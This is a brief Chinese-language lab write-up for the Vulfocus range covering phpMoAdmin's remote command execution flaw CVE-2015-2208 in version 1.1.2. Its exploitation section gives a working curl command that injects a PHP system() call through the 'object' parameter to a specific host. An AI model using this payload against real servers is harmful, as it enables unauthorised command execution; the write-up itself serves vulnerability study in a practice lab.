Vulfocus靶场 | phpmoadmin代码执行CVE-2015-2208

1、产品简介

phpMoAdmin 是一个用PHP 开发的在线MongoDB 管理工具，可用于创建、删除和修改数据库和索引，提供视图和数据搜索工具，提供数据库启动时间和内存的统计，支持JSON 格式数据的导入导出。

2、漏洞概述

moadmin.php脚本中的‘saveObject’函数存在安全漏洞。远程攻击者可借助‘object’参数中的shell元字符利用该漏洞执行任意命令。

3、影响范围

v1.1.2

4、利用流程

Linux下执行：

curl http://123.58.224.8:64125/moadmin.php -d 'object=1;system("ls /tmp");'